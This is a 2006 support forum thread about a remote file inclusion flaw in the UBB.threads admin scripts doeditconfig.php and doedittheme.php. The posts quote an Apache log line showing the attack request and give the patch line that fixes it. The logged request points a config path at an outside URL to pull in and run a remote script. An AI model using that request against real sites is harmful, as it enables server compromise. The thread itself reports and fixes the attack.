Site Links
Home
Features
Documentation
Pricing & Order
Members Area
Support Options
UBBDev.com
UBBWiki.com
Who's Online Now
1 registered members (mmkk), 71 guests, and 414 spiders.
Key: Admin, Global Mod, Mod
Member Spotlight
Mark S
Mark S
Liverpool : England : UK
Posts: 4,704
Joined: July 2006
Show All Member Profiles 
Top Posters(30 Days)
Gizmo 15
FREAK 11
M4TT 11
Ruben 6
mmkk 5
isaac 4
Latest Photos
Chinese Buddhist temple.
My buddha beads.
Rendered Walls
Multi-Screen wallpaper
Stockholm Metro
Previous Thread
Next Thread
Print Thread
security flaw in doedittheme.php and doeditconfig.php #130034
09/30/06 04:28 AM
09/30/06 04:28 AM
Joined: May 2006
Posts: 9
R
RSchiffman Offline OP
stranger
RSchiffman  Offline OP
stranger
R
Joined: May 2006
Posts: 9
There is a flaw in doedittheme.php and doeditconfig.php. The symptom is that the config.inc.php gets mostly truncated and the board is blank because it can't connect to the DB. The appropriate line in the apache log is:
158.39.35.18 - - [30/Sep/2006:00:29:13 -0700] "GET /ubb/admin/doeditconfig.php?thispath=../includes&config[path]=http://abok.us/cmd
.gif? HTTP/1.1" 200 171 "-" "libwww-perl/5.65"

and

It also takes place with doedittheme as well. This is being run from multiple locations. We had a different one from spain with as well. I'm running 6.5.1 with the other security hold fixed manually. I'll update to 6.5.5, but I didn't see anything to indicate that this is fixed in the update.

Re: security flaw in doedittheme.php and doeditconfig.php #130035
09/30/06 04:45 AM
09/30/06 04:45 AM
Joined: May 2006
Posts: 9
R
RSchiffman Offline OP
stranger
RSchiffman  Offline OP
stranger
R
Joined: May 2006
Posts: 9
The gif file injects a perl script. I have a copy of the script if you need it. I will be gone today, but I can do it tomorrow if you need.

Re: security flaw in doedittheme.php and doeditconfig.php #130036
09/30/06 09:29 AM
09/30/06 09:29 AM
Joined: Jun 2006
Posts: 10,177
Aberdeen, WA
R
Rick Offline
Former Developer
Rick  Offline
Former Developer
R
Joined: Jun 2006
Posts: 10,177
Aberdeen, WA
This was fixed in either 6.5.4 or 6.5.5. Basically each of these scripts needs this line at the top after the block of header comments. This keeps these scripts from being called directly.

if (!defined('IS_ADMIN')) exit;

You probably got hit from multiple locations because this was reposted on bugtraq yesterday. It's the same description of the exploit that was posted a few months back when we put out 6.5.4 and 6.5.5.

Re: security flaw in doedittheme.php and doeditconfig.php #130037
09/30/06 12:19 PM
09/30/06 12:19 PM
Joined: Jun 2006
Posts: 292
Charlotte, NC
JoshPet Offline
enthusiast
JoshPet  Offline
enthusiast
Joined: Jun 2006
Posts: 292
Charlotte, NC
Ah - yeah, I've had 4 or 5 clients hit with this today, this explains why the hacks are coming out of the woodwork. Thanks for the fix. <img src="https://www.ubbcentral.com/boards/images/graemlins/wink.gif" alt="" />


Joshua Pettit
Web Developer
www.ThreadsDev.net | www.JoshuaPettit.com
Re: security flaw in doedittheme.php and doeditconfig.php #130038
10/01/06 06:46 PM
10/01/06 06:46 PM
Joined: Oct 2006
Posts: 2
B
Bonny Offline
stranger
Bonny  Offline
stranger
B
Joined: Oct 2006
Posts: 2
6.5.5?? The "Version notes" on the website only go up to 6.5.2, which is what we're running - have these not been updated? We've been hit with this same exploit.

Re: security flaw in doedittheme.php and doeditconfig.php #130039
10/01/06 09:04 PM
10/01/06 09:04 PM
Joined: Jun 2006
Posts: 10,177
Aberdeen, WA
R
Rick Offline
Former Developer
Rick  Offline
Former Developer
R
Joined: Jun 2006
Posts: 10,177
Aberdeen, WA
It looks like the version notes haven't been updated. We did send out an email to all of our customers trying to make sure that everyone got notified of the problem and that an upgrade was available.


Shout Box
Today's Birthdays
No Birthdays
Recent Topics
Users Unable to Upload Avatar
by M4TT. 12/13/17 08:51 AM
Shout Box Sound Effect
by M4TT. 11/29/17 08:28 PM
Ad island
by TGCsanderson. 11/25/17 06:41 PM
Taking to long to connect to DB
by AstroCat. 11/24/17 12:34 PM
Forum Statistics
Forums36
Topics35,015
Posts190,535
Members12,045
Most Online978
Jun 24th, 2007
Random Image
Powered by UBB.threads™ PHP Forum Software 7.6.1
(Snapshot build 20171106)